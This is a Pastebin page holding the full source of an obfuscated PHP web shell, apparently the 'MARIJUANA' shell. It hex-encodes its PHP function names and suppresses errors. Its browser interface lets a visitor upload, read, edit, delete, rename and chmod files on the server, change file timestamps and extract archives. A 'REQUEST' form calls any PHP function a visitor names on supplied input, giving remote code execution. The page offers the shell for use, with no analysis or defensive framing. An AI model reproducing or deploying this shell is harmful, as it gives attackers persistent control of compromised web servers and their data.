Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php header("X-XSS-Protection: 0");ob_start();set_time_limit(0);error_reporting(0);ini_set('display_errors', FALSE);
- $Array = [
- '7068705f756e616d65',
- '70687076657273696f6e',
- '6368646972',
- '676574637764',
- '707265675f73706c6974',
- '636f7079',
- '66696c655f6765745f636f6e74656e7473',
- '6261736536345f6465636f6465',
- '69735f646972',
- '6f625f656e645f636c65616e28293b',
- '756e6c696e6b',
- '6d6b646972',
- '63686d6f64',
- '7363616e646972',
- '7374725f7265706c616365',
- '68746d6c7370656369616c6368617273',
- '7661725f64756d70',
- '666f70656e',
- '667772697465',
- '66636c6f7365',
- '64617465',
- '66696c656d74696d65',
- '737562737472',
- '737072696e7466',
- '66696c657065726d73',
- '746f756368',
- '66696c655f657869737473',
- '72656e616d65',
- '69735f6172726179',
- '69735f6f626a656374',
- '737472706f73',
- '69735f7772697461626c65',
- '69735f7265616461626c65',
- '737472746f74696d65',
- '66696c6573697a65',
- '726d646972',
- '6f625f6765745f636c65616e',
- '7265616466696c65',
- '617373657274',
- ];
- $___ = count($Array);
- for($i=0;$i<$___;$i++) {
- $GNJ[] = uhex($Array[$i]);
- }
- ?>
- <!DOCTYPE html>
- <html dir="auto" lang="en-US">
- <link rel="icon" href="//0x5a455553.github.io/MARIJUANA/icon.png" />
- <link rel="stylesheet" href="//0x5a455553.github.io/MARIJUANA/main.css" type="text/css">
- <script src="//ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
- <script src="//cdnjs.cloudflare.com/ajax/libs/notify/0.4.2/notify.min.js"></script>
- </head>
- <body>
- <header>
- <div class="y x">
- <a class="ajx" href="<?php echo basename($_SERVER['PHP_SELF']);?>">
- NG4R3P
- </a>
- </div>
- <div class="q x w">
- </div>
- </header>
- <article>
- <div class="i">
- <i class="far fa-hdd"></i>
- <?php echo $GNJ[0]();?>
- <br />
- <i class="far fa-lightbulb"></i>   <b>SOFT :</b> <?php echo $_SERVER['SERVER_SOFTWARE'];?> <b>PHP :</b> <?php echo $GNJ[1]();?>
- <br />
- <i class="far fa-folder"></i>
- <?php
- if(isset($_GET["d"])) {
- $d = uhex($_GET["d"]);
- $GNJ[2](uhex($_GET["d"]));
- }
- else {
- $d = $GNJ[3]();
- }
- $k = $GNJ[4]("/(\\\|\/)/", $d );
- foreach ($k as $m => $l) {
- if($l=='' && $m==0) {
- echo '<a class="ajx" href="?d=2f">/</a>';
- }
- if($l == '') {
- continue;
- }
- echo '<a class="ajx" href="?d=';
- for ($i = 0; $i <= $m; $i++) {
- echo hex($k[$i]);
- if($i != $m) {
- echo '2f';
- }
- }
- echo '">'.$l.'</a>/';
- }
- ?>
- <br />
- </div>
- <div class="u">
- <?php echo $_SERVER['SERVER_ADDR'];?> <i class="fas fa-link"></i>
- <br />
- <br />
- <form method="post" enctype="multipart/form-data">
- <label class="l w">
- <input type="file" name="n[]" onchange="this.form.submit()" multiple> UPLOAD
- </label>
- </form>
- <?php
- $o_ = [
- '<script>$.notify("',
- '", { className:"1",autoHideDelay: 2000,position:"left bottom" });</script>'
- ];
- $f = $o_[0].'OK!'.$o_[1];
- $g = $o_[0].'ER!'.$o_[1];
- if(isset($_FILES["n"])) {
- $z = $_FILES["n"]["name"];
- $r = count($z);
- for( $i=0 ; $i < $r ; $i++ ) {
- if($GNJ[5]($_FILES["n"]["tmp_name"][$i], $z[$i])) {
- echo $f;
- }
- else {
- echo $g;
- }
- }
- }
- ?>
- </div>
- <?php
- $a_ = '<table cellspacing="0" cellpadding="7" width="100%">
- <thead>
- <tr>
- <th>';
- $b_ = '</th>
- </tr>
- </thead>
- <tbody>
- <tr>
- <td></td>
- </tr>
- <tr>
- <td class="x">';
- $c_ = '</td>
- </tr>
- </tbody>
- </table>';
- $d_ = '<br />
- <br />
- <input type="submit" class="w" value=" OK " />
- </form>';
- if(isset($_GET["s"])) {
- echo $a_.uhex($_GET["s"]).$b_.'
- <textarea readonly="yes">'.$GNJ[15]($GNJ[6](uhex($_GET["s"]))).'</textarea>
- <br />
- <br />
- <input onclick="location.href=\'?d='.$_GET["d"].'&e='.$_GET["s"].'\'" type="submit" class="w" value=" EDIT " />
- '.$c_;
- }
- elseif(isset($_GET["y"])) {
- echo $a_.'REQUEST'.$b_.'
- <form method="post">
- <input class="x" type="text" name="1" />
- <input class="x" type="text" name="2" />
- '.$d_.'
- <br />
- <textarea readonly="yes">';
- if(isset($_POST["2"])) {
- echo $GNJ[15](dre($_POST["1"], $_POST["2"]));
- }
- echo '</textarea>
- '.$c_;
- }
- elseif(isset($_GET["e"])) {
- echo $a_.uhex($_GET["e"]).$b_.'
- <form method="post">
- <textarea name="e" class="o">'.$GNJ[15]($GNJ[6](uhex($_GET["e"]))).'</textarea>
- <br />
- <br />
- <span class="w">BASE64</span> :
- <select id="b64" name="b64">
- <option value="0">NO</option>
- <option value="1">YES</option>
- </select>
- '.$d_.'
- '.$c_.'
- <script>
- $("#b64").change(function() {
- if($("#b64 option:selected").val() == 0) {
- var X = $("textarea").val();
- var Z = atob(X);
- $("textarea").val(Z);
- }
- else {
- var N = $("textarea").val();
- var I = btoa(N);
- $("textarea").val(I);
- }
- });
- </script>';
- if(isset($_POST["e"])) {
- if($_POST["b64"] == "1") {
- $ex = $GNJ[7]($_POST["e"]);
- }
- else {
- $ex = $_POST["e"];
- }
- $fp = $GNJ[17](uhex($_GET["e"]), 'w');
- if($GNJ[18]($fp, $ex)) {
- OK();
- }
- else {
- ER();
- }
- $GNJ[19]($fp);
- }
- }
- elseif(isset($_GET["x"])) {
- rec(uhex($_GET["x"]));
- if($GNJ[26](uhex($_GET["x"]))) {
- ER();
- }
- else {
- OK();
- }
- }
- elseif(isset($_GET["t"])) {
- echo $a_.uhex($_GET["t"]).$b_.'
- <form action="" method="post">
- <input name="t" class="x" type="text" value="'.$GNJ[20]("Y-m-d H:i", $GNJ[21](uhex($_GET["t"]))).'">
- '.$d_.'
- '.$c_;
- if( !empty($_POST["t"]) ) {
- $p = $GNJ[33]($_POST["t"]);
- if($p) {
- if(!$GNJ[25](uhex($_GET["t"]),$p,$p)) {
- ER();
- }
- else {
- OK();
- }
- }
- else {
- ER();
- }
- }
- }
- elseif(isset($_GET["k"])) {
- echo $a_.uhex($_GET["k"]).$b_.'
- <form action="" method="post">
- <input name="b" class="x" type="text" value="'.$GNJ[22]($GNJ[23]('%o', $GNJ[24](uhex($_GET["k"]))), -4).'">
- '.$d_.'
- '.$c_;
- if(!empty($_POST["b"])) {
- $x = $_POST["b"];
- $t = 0;
- for($i=strlen($x)-1;$i>=0;--$i)
- $t += (int)$x[$i]*pow(8, (strlen($x)-$i-1));
- if(!$GNJ[12](uhex($_GET["k"]), $t)) {
- ER();
- }
- else {
- OK();
- }
- }
- }
- elseif(isset($_GET["l"])) {
- echo $a_.'+DIR'.$b_.'
- <form action="" method="post">
- <input name="l" class="x" type="text" value="">
- '.$d_.'
- '.$c_;
- if(isset($_POST["l"])) {
- if(!$GNJ[11]($_POST["l"])) {
- ER();
- }
- else {
- OK();
- }
- }
- }
- elseif(isset($_GET["q"])) {
- if($GNJ[10](__FILE__)) {
- $GNJ[38]($GNJ[9]);
- header("Location: ".basename($_SERVER['PHP_SELF'])."");
- exit();
- }
- else {
- echo $g;
- }
- }
- elseif(isset($_GET["n"])) {
- echo $a_.'+FILE'.$b_.'
- <form action="" method="post">
- <input name="n" class="x" type="text" value="">
- '.$d_.'
- '.$c_;
- if(isset($_POST["n"])) {
- if(!$GNJ[25]($_POST["n"])) {
- ER();
- }
- else {
- OK();
- }
- }
- }
- elseif(isset($_GET["r"])) {
- echo $a_.uhex($_GET["r"]).$b_.'
- <form action="" method="post">
- <input name="r" class="x" type="text" value="'.uhex($_GET["r"]).'">
- '.$d_.'
- '.$c_;
- if(isset($_POST["r"])) {
- if($GNJ[26]($_POST["r"])) {
- ER();
- }
- else {
- if($GNJ[27](uhex($_GET["r"]), $_POST["r"])) {
- OK();
- }
- else {
- ER();
- }
- }
- }
- }
- elseif(isset($_GET["z"])) {
- $zip = new ZipArchive;
- $res = $zip->open(uhex($_GET["z"]));
- if($res === TRUE) {
- $zip->extractTo(uhex($_GET["d"]));
- $zip->close();
- OK();
- } else {
- ER();
- }
- }
- else {
- echo '<table cellspacing="0" cellpadding="7" width="100%">
- <thead>
- <tr>
- <th width="44%">[ NAME ]</th>
- <th width="11%">[ SIZE ]</th>
- <th width="17%">[ PERM ]</th>
- <th width="17%">[ DATE ]</th>
- <th width="11%">[ ACT ]</th>
- </tr>
- </thead>
- <tbody>
- <tr>
- <td>
- <a class="ajx" href="?d='.hex($d).'&n">+FILE</a>
- <a class="ajx" href="?d='.hex($d).'&l">+DIR</a>
- </td>
- </tr>
- ';
- $h = "";
- $j = "";
- $w = $GNJ[13]($d);
- if($GNJ[28]($w) || $GNJ[29]($w)) {
- foreach($w as $c){
- $e = $GNJ[14]("\\", "/", $d);
- if(!$GNJ[30]($c, ".zip")) {
- $zi = '';
- }
- else {
- $zi = '<a href="?d='.hex($e).'&z='.hex($c).'">U</a>';
- }
- if($GNJ[31]("$d/$c")) {
- $o = "";
- }
- elseif(!$GNJ[32]("$d/$c")) {
- $o = " h";
- }
- else {
- $o = " w";
- }
- $s = $GNJ[34]("$d/$c") / 1024;
- $s = round($s, 3);
- if($s>=1024) {
- $s = round($s/1024, 2) . " MB";
- } else {
- $s = $s . " KB";
- }
- if(($c != ".") && ($c != "..")){
- ($GNJ[8]("$d/$c")) ?
- $h .= '<tr class="r">
- <td>
- <i class="far fa-folder m"></i>
- <a class="ajx" href="?d='.hex($e).hex("/".$c).'">'.$c.'</a>
- </td>
- <td class="x">
- dir
- </td>
- <td class="x">
- <a class="ajx'.$o.'" href="?d='.hex($e).'&k='.hex($c).'">'.x("$d/$c").'</a>
- </td>
- <td class="x">
- <a class="ajx" href="?d='.hex($e).'&t='.hex($c).'">'.$GNJ[20]("Y-m-d H:i", $GNJ[21]("$d/$c")).'</a>
- </td>
- <td class="x">
- <a class="ajx" href="?d='.hex($e).'&r='.hex($c).'">R</a>
- <a href="?d='.hex($e).'&x='.hex($c).'">D</a>
- </td>
- </tr>
- '
- :
- $j .= '<tr class="r">
- <td>
- <i class="far fa-file m"></i> 
- <a class="ajx" href="?d='.hex($e).'&s='.hex($c).'">'.$c.'</a>
- </td>
- <td class="x">
- '.$s.'
- </td>
- <td class="x">
- <a class="ajx'.$o.'" href="?d='.hex($e).'&k='.hex($c).'">'.x("$d/$c").'</a>
- </td>
- <td class="x">
- <a class="ajx" href="?d='.hex($e).'&t='.hex($c).'">'.$GNJ[20]("Y-m-d H:i", $GNJ[21]("$d/$c")).'</a>
- </td>
- <td class="x">
- <a class="ajx" href="?d='.hex($e).'&r='.hex($c).'">R</a>
- <a class="ajx" href="?d='.hex($e).'&e='.hex($c).'">E</a>
- <a href="?d='.hex($e).'&g='.hex($c).'">G</a>
- '.$zi.'
- <a href="?d='.hex($e).'&x='.hex($c).'">D</a>
- </td>
- </tr>
- ';
- }
- }
- }
- echo $h;
- echo $j;
- echo '</tbody>
- <tfoot>
- <tr>
- <th class="et">
- <a class="ajx" href="?d='.hex($e).'&y">REQUEST</a>
- <a href="?d='.hex($e).'&q">EXIT</a>
- </th>
- <th class="et" width="11%"></th>
- <th class="et" width="17%"></th>
- <th class="et" width="17%"></th>
- <th class="et" width="11%"></th>
- </tr>
- </tfoot>
- </table>';
- }
- ?>
- </article>
- <footer class="x">
- </footer>
- <?php
- if(isset($_GET["1"])) {
- echo $f;
- }
- elseif(isset($_GET["0"])) {
- echo $g;
- }
- else {
- NULL;
- }
- ?>
- <script>
- $(".ajx").click(function(t){t.preventDefault();var e=$(this).attr("href");history.pushState("","",e),$.get(e,function(t){$("body").html(t)})});
- </script>
- </body>
- </html>
- <?php
- function rec($j) {
- global $GNJ;
- if(trim(pathinfo($j, PATHINFO_BASENAME ), '.') === '') {
- return;
- }
- if($GNJ[8]($j)) {
- array_map('rec', glob($j . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT));
- $GNJ[35]($j);
- }
- else {
- $GNJ[10]($j);
- }
- }
- function dre($y1, $y2) {
- global $GNJ;
- ob_start();
- $GNJ[16]($y1($y2));
- return $GNJ[36]();
- }
- function hex($n) {
- $y='';
- for ($i=0; $i < strlen($n); $i++){
- $y .= dechex(ord($n[$i]));
- }
- return $y;
- }
- function uhex($y) {
- $n='';
- for ($i=0; $i < strlen($y)-1; $i+=2){
- $n .= chr(hexdec($y[$i].$y[$i+1]));
- }
- return $n;
- }
- function OK() {
- global $GNJ, $d;
- $GNJ[38]($GNJ[9]);
- header("Location: ?d=".hex($d)."&1");
- exit();
- }
- function ER() {
- global $GNJ, $d;
- $GNJ[38]($GNJ[9]);
- header("Location: ?d=".hex($d)."&0");
- exit();
- }
- function x($c) {
- global $GNJ;
- $x = $GNJ[24]($c);
- if(($x & 0xC000) == 0xC000) {
- $u = "s";
- }
- elseif(($x & 0xA000) == 0xA000) {
- $u = "l";
- }
- elseif(($x & 0x8000) == 0x8000) {
- $u = "-";
- }
- elseif(($x & 0x6000) == 0x6000) {
- $u = "b";
- }
- elseif(($x & 0x4000) == 0x4000) {
- $u = "d";
- }
- elseif(($x & 0x2000) == 0x2000) {
- $u = "c";
- }
- elseif(($x & 0x1000) == 0x1000) {
- $u = "p";
- }
- else {
- $u = "u";
- }
- $u .= (($x & 0x0100) ? "r" : "-");
- $u .= (($x & 0x0080) ? "w" : "-");
- $u .= (($x & 0x0040) ? (($x & 0x0800) ? "s" : "x") : (($x & 0x0800) ? "S" : "-"));
- $u .= (($x & 0x0020) ? "r" : "-");
- $u .= (($x & 0x0010) ? "w" : "-");
- $u .= (($x & 0x0008) ? (($x & 0x0400) ? "s" : "x") : (($x & 0x0400) ? "S" : "-"));
- $u .= (($x & 0x0004) ? "r" : "-");
- $u .= (($x & 0x0002) ? "w" : "-");
- $u .= (($x & 0x0001) ? (($x & 0x0200) ? "t" : "x") : (($x & 0x0200) ? "T" : "-"));
- return $u;
- }
- if(isset($_GET["g"])) {
- $GNJ[38]($GNJ[9]);
- header("Content-Type: application/octet-stream");
- header("Content-Transfer-Encoding: Binary");
- header("Content-Length: ".$GNJ[34](uhex($_GET["g"])));
- header("Content-disposition: attachment; filename=\"".uhex($_GET["g"])."\"");
- $GNJ[37](uhex($_GET["g"]));
- }
- ?>
Add Comment
Please, Sign In to add comment
